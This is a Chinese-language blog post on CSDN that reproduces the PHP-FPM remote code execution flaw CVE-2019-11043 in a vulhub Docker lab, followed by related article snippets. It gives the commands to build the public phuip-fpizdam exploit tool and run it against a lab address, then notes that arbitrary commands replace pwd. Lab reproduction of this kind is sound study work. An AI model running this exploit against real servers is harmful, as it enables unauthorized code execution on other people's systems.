PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现

最新推荐文章于 2024-11-14 15:22:28 发布
最新推荐文章于 2024-11-14 15:22:28 发布
阅读量170 收藏
点赞数 3
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45079558/article/details/142034295
版权
环境搭建

启动环境

切换目录到vulhub/php/CVE-2019-11043下

启动容器

docker-compose up -d

查看端口

docker ps

端口为:8080,访问网站,搭建成功

安装漏洞利用工具

git clone https://github.com/neex/phuip-fpizdam.git

cd phuip-fpizdam

go env -w GOPROXY=https://goproxy.cn

go get -v && go build

攻击

go run . "http://172.16.1.14:8080//index.php"

显示漏洞利用成功

浏览器进行访问,成功复现,pwd可替换为其他命令

亚历山大——纯真丁一郎
关注
CVE-2019-11043 PHP-fpm 远程代码执行漏洞复现
afei001
01-21 423
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Vulnhub搭建CVE-2019-11043漏洞环境 5.2 CVE-2019-11043漏洞利用 (1)phuip-fpizdam工具利用 (2)github CVE-2019-11043_RCE_1.py (3)CVE-2019-11043_RCE_2.py 6.漏洞修复 1.漏洞概述 在长亭科技举办的 Real World CTF中,国外安全研究员 Andrew Dana...
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 3303
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全。
php-fpm漏洞复现CVE-2019-11043)
frinck的博客
11-08 1476
1.php-fpm漏洞详情 当nginx使用特定的fastcgi配置的时候,就会存在远程代码执行漏洞,但是这个配置并不是默认配置 fastcgi_split_path_info字段配置为^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造playload造成远程代码执行,改配置已经被广泛使用,危害较大。 2.复现 安装docker环境 git clone https://gith...
漏洞复现PHP-FPM 远程代码执行漏洞CVE-2019-11043
Hi~ 土拨鼠
12-26 626
文章目录一、漏洞简介二、漏洞环境准备三、漏洞复现 一、漏洞简介 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送换行符%0a 时,服务器返回异常。该漏洞需要在nginx.conf 中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.p
cve漏洞复现php,PHP-FPM 远程代码执行漏洞CVE-2019-11043)的简单复现学习
weixin_42300400的博客
03-19 311
1.概述漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_INFO 值为空,从而触发该漏洞,通过发送特制的URL请求,在一些特殊的配置情况下会导致任意代码...
利用Vulnhub复现漏洞 - PHP-FPM Fastcgi 未授权访问漏洞
JiangBuLiu的博客
07-08 2397
PHP-FPM Fastcgi 未授权访问漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现EXP测试EXP由于访问非*.PHP文件,所以返回结果403使用命令执行一个默认存在的php文件任意命令执行复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/fpm/ 漏洞原理 https://www.leavesongs.com/PENETR...
PHP-FPM 远程代码执行漏洞CVE-2019-11043
qq_43571759的博客
05-24 679
PHP-FPM 远程代码执行漏洞CVE-2019-11043) 文章目录PHP-FPM 远程代码执行漏洞CVE-2019-11043漏洞分析漏洞利用漏洞修复 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码漏洞分析 首先使用docker搭建漏洞环境,进入
PHP-fpm远程代码执行漏洞(CVE-2019-11043)
老北京砸酱锤的博客
06-22 1022
漏洞介绍 Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。 Nginx+php-fpm的服务器,在使用如下配置的时候,可能存在远程代码执行漏洞漏洞复现 使用vulhub复现漏洞,进入CVE-2019-11043文件夹下(cd /home/apple/vulhub/ph
Ngnix PHP-FPM 远程代码执行漏洞复现(CVE-2019-11043)
K8哥哥
12-26 953
漏洞简介 PHP-FPM 远程代码执行漏洞(CVE-2019-11043) 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 Example 和Lad...
php-fpm在nginx特定环境下的任意代码执行漏洞CVE-2019-11043
无心的博客
10-26 1716
目录 0x01 漏洞介绍 0x02 漏洞影响 0x03 漏洞复现 0x01 漏洞介绍 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 符号时,服务返回异常,疑似存在漏洞。 在nginx上,fastcgi_split_path_info处理带有 的请求时,会因为遇到换行符n,导致PATH_I...
php-fpm+nginx+php7命令执行漏洞复现过程记录
win176489的博客
11-08 2466
php-fpm+nginx+php7命令执行漏洞复现 受影响的版本php7.0~php7.3 漏洞环境搭建 漏洞靶机ubuntu16.04 docker环境 攻击机kali go环境 过程 一.搭建docker环境 可参考这个大神的搭建过程 https://blog.csdn.net/jinking01/article/details/82490688 二.下载漏洞环境 地址 https:...
MDBook 使用指南
qq_39517117的博客
11-12 549
介绍了 MDBook 的基本使用方法,并演示了一个简单的构建过程。
C语言入门到精通(第六版)——第十六章
最新发布
qq_63485530的博客
11-14 662
3、本地网络上的其他主机接收到ARP请求帧后,检查是否与自己的IP地址匹配,如果不匹配,则丢弃APR请求帧,如果主机B发现与自己的IP地址匹配,则将主机A的物理地址和IP地址添加到自己的ARP缓存中,然后主机B将自己的物理地址和IP地址发送给主机A,当主机A接收到主机B发来的信息后,将用这些信息更新ARP缓存。在发送数据时,应用层的数据传输到传输层,加上TCP的首部,数据就构成了报文。简单来说,套接字就是一个假想的连接装置,其作用类似于插座,插座用于连接电器和电线,套接字用于连接程序和网络,完成通信功能。
【故障解决】麒麟系统右下角网络图标取消显示叹号
鹏大圣运维
11-13 1015
Hello,大家好啊!今天给大家带来一篇关于如何在麒麟系统中解决网络图标出现感叹号问题的文章。在日常使用麒麟系统的过程中,我们在内网或公网环境下,有时会遇到网络图标上出现感叹号的情况。这通常是因为系统默认的 NetworkManager.conf 配置文件中指定了一个用于网络探测的 uri 地址,当系统无法访问这个地址时,就会认为网络不通,从而显示感叹号。即便在公网环境下,有时也会遇到这种问题。今天我们就来介绍几种解决方法,帮助大家轻松排除困扰!欢迎大家分享点赞,点个在看和关注吧!
Wordpress常用配置,包括看板娘跨域等
kayotin的博客
11-14 271
搭建Wordpress博客时,一些常用配置。
TCP/IP协议,TCP和UDP区别
眷怀的博客
11-11 981
TCP/IP是用于计算机网络通信的基础协议集。包括互联网层(IP)传输层(TCP/UDP)和应用层等,确保数据在网络中可靠传输和有效路由。常见协议有等。TCP提供可靠、面向连接的服务,适合对数据传输有高可靠性要求的应用。UDP提供简单、无连接的服务,适合实时性要求高的应用。理解这些协议和它们的工作方式对于网络配置、故障排查和优化非常重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值